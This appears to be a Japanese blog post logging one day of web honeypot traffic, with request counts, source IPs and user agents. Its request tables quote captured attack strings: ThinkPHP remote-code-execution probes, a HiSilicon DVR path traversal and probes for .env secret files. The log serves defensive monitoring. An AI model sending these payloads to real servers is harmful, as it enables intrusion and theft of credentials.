ハニーポット(仮) 観測記録 2019/09/15分です。
特徴
Region:AP
HiSilicon DVR Devicesの脆弱性を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
を確認しました。
Region:US
HiSilicon DVR Devicesの脆弱性を狙うアクセス
Nmapによるスキャン行為
zgrabによるスキャン行為
を確認しました。
Region:EU
ThinkPHPの脆弱性を狙うアクセス
112[.]124[.]42[.]80に関する不正通信
を確認しました。
他
アクセス数推移
AP:総アクセス数:20 (前日比:+11)
US:総アクセス数:21 (前日比:0)
EU:総アクセス数:35 (前日比:+22)
都合により GET / HTTP/1.1 POST / HTTP/1.1 は除いています。
Region:AP
送信元IPアドレス一覧
件数 | 送信元IPアドレス | 国 |
---|---|---|
4 | 112.29.140.228 | China |
1 | 13.56.33.144 | United States |
1 | 157.55.39.18 | United States |
1 | 171.238.51.135 | Vietnam |
4 | 180.101.253.161 | China |
1 | 185.156.177.233 | Russia |
4 | 190.58.249.214 | Trinidad and Tobago |
1 | 202.137.120.241 | Philippines |
2 | 47.95.224.246 | China |
1 | 60.191.52.254 | China |
UserAgent一覧
件数 | UserAgent |
---|---|
4 | - |
3 | Go-http-client/1.1 |
1 | Mozilla/5.0 |
1 | Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) |
1 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36 |
1 | Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0 |
9 | Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6) |
リクエスト内容一覧
件数 | Method | Request | Protocol |
---|---|---|---|
1 | GET | /.env | HTTP/1.1 |
2 | GET | ../../mnt/custom/ProductDefinition | HTTP |
1 | GET | /robots.txt | HTTP/1.1 |
3 | GET | /TP/index.php | HTTP/1.1 |
3 | GET | /TP/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1]=1 | HTTP/1.1 |
3 | GET | /TP/public/index.php | HTTP/1.1 |
1 | GET | /webdav/ | HTTP/1.1 |
1 | HEAD | / | HTTP/1.1 |
3 | POST | /TP/index.php?s=captcha | HTTP/1.1 |
1 | PROPFIND | / | HTTP/1.1 |
1 | \x03 |
Region:US
送信元IPアドレス一覧
件数 | 送信元IPアドレス | 国 |
---|---|---|
1 | 113.173.170.105 | Vietnam |
1 | 120.29.82.72 | Philippines |
1 | 123.20.122.101 | Vietnam |
1 | 167.99.143.169 | United States |
1 | 185.156.177.235 | Russia |
1 | 210.60.110.4 | Taiwan |
2 | 70.15.250.156 | United States |
1 | 72.69.204.59 | United States |
8 | 79.134.5.215 | Russia |
1 | 84.22.134.112 | Russia |
1 | 90.188.44.160 | Russia |
1 | 91.134.131.128 | France |
1 | 91.233.186.133 | Poland |
UserAgent一覧
件数 | UserAgent |
---|---|
18 | - |
1 | Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; WOW64; Trident/6.0) |
1 | Mozilla/5.0 (compatible; Nmap Scripting Engine; http://nmap.org/book/nse.html) |
1 | Mozilla/5.0 zgrab/0.x |
リクエスト内容一覧
件数 | Method | Request | Protocol |
---|---|---|---|
1 | GET | /manager/html | HTTP/1.1 |
17 | GET | ../../mnt/custom/ProductDefinition | HTTP |
1 | GET | /nginx_status | HTTP/1.1 |
1 | GET | /WSMAN | HTTP/1.1 |
1 | \x03 |
Region:EU
送信元IPアドレス一覧
件数 | 送信元IPアドレス | 国 |
---|---|---|
1 | 114.115.236.68 | China |
10 | 120.236.0.230 | China |
10 | 123.207.53.48 | China |
10 | 180.96.14.25 | China |
1 | 18.130.20.91 | United States |
1 | 60.191.52.254 | China |
1 | 61.147.103.168 | China |
1 | 61.219.11.153 | Taiwan |
UserAgent一覧
件数 | UserAgent |
---|---|
2 | - |
3 | Go-http-client/1.1 |
1 | Mozilla/3.0 (compatible; Indy Library) |
1 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36 |
1 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36 |
27 | Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6) |
リクエスト内容一覧
件数 | Method | Request | Protocol |
---|---|---|---|
1 | - | ||
3 | GET | /elrekt.php | HTTP/1.1 |
3 | GET | /html/public/index.php | HTTP/1.1 |
3 | GET | /index.php | HTTP/1.1 |
3 | GET | /index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1]=1 | HTTP/1.1 |
1 | GET | /manager/html | HTTP/1.1 |
3 | GET | /public/index.php | HTTP/1.1 |
1 | GET | //static/css/kidbin.css | HTTP/1.1 |
3 | GET | /thinkphp/html/public/index.php | HTTP/1.1 |
3 | GET | /TP/html/public/index.php | HTTP/1.1 |
3 | GET | /TP/index.php | HTTP/1.1 |
3 | GET | /TP/public/index.php | HTTP/1.1 |
1 | HEAD | / | HTTP/1.1 |
1 | HEAD | http://112[.]124[.]42[.]80:63435/ | HTTP/1.1 |
3 | POST | /index.php?s=captcha | HTTP/1.1 |